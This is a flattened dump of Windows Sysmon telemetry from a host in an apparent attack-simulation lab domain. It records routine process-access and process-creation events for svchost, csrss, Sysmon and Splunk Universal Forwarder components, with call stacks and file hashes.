14:07:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.392{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.392{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.392{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9631-6005-7405-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.392{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9631-6005-7405-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.391{59A5CD1D-9631-6005-7405-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.802{59A5CD1D-9632-6005-7605-00000000A301}59164100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9632-6005-7605-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9632-6005-7605-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.656{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9632-6005-7605-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.657{59A5CD1D-9632-6005-7605-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.219{59A5CD1D-9632-6005-7505-00000000A301}63326400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9632-6005-7505-00000000A301}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9632-6005-7505-00000000A301}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9632-6005-7505-00000000A301}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:46.063{59A5CD1D-9632-6005-7505-00000000A301}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.922{59A5CD1D-9634-6005-7805-00000000A301}65526672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9634-6005-7805-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 